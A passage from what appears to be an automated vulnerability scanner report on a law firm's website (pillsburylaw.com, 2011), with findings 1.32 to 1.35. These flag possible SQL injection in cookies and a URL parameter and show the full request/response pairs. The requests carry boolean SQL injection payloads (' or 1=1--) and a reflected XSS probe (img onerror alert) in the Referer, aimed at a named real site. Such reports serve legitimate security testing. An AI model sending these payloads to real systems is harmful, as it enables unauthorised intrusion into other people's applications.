Set-Cookie: PCONNECTID=;expires=Thu, 13-May-2010 00:36:15 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=67778256'%20or%201%3d2--%20; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:36:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...
1.32. http://www.pillsburylaw.com/a [PCUSERNAME cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The PCUSERNAME cookie appears to be vulnerable to SQL injection attacks. The payloads 79438194'%20or%201%3d1--%20 and 79438194'%20or%201%3d2--%20 were each submitted in the PCUSERNAME cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=79438194'%20or%201%3d1--%20; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:36:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: PCUSERNAME=;expires=Thu, 13-May-2010 00:36:25 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=79438194'%20or%201%3d2--%20; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:36:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...
1.33. http://www.pillsburylaw.com/a [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 20667745'%20or%201%3d1--%20 and 20667745'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a20667745'%20or%201%3d1--%20 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:37:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /a20667745'%20or%201%3d2--%20 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 13 May 2011 00:37:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...
1.34. http://www.pillsburylaw.com/a [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 80264836'%20or%201%3d1--%20 and 80264836'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.480264836'%20or%201%3d1--%20; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:34:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Thu, 13-May-2010 00:34:26 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.480264836'%20or%201%3d2--%20; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:34:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...
1.35. http://www.pillsburylaw.com/a [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 86405570%20or%201%3d1--%20 and 86405570%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=24928704686405570%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:36:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Thu, 13-May-2010 00:36:56 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=24928704686405570%20or%201%3d2--%20

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:36:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...
